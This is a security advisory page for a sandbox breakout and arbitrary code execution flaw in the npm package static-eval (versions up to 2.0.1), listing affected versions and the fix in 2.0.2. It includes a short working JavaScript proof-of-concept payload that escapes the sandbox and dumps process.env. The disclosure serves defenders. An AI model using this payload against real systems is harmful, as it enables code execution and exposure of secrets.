Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXg5aGMtcnczNS1mNDRo

High
Permalink JSON

Sandbox Breakout / Arbitrary Code Execution in static-eval

Affected Packages Affected Versions Fixed Versions
npm:static-eval
PURL: pkg:npm/static-eval
<= 2.0.1 2.0.2
109 Dependent packages
132,071 Dependent repositories
19,020,649 Downloads last month

Affected Version Ranges

All affected versions

0.0.0, 0.1.0, 0.1.1, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 1.0.0, 1.1.0, 1.1.1, 2.0.0, 2.0.1

All unaffected versions

2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1

Versions of static-evalprior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;

var src = process.argv[2];
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()'
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));

Recommendation

Upgrade to version 2.0.2 or later.

References:

Identifiers

GHSA-x9hc-rw35-f44h

Risk

Severity

High

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Date and time

Published

over 5 years ago

Updated

almost 3 years ago

API

JSON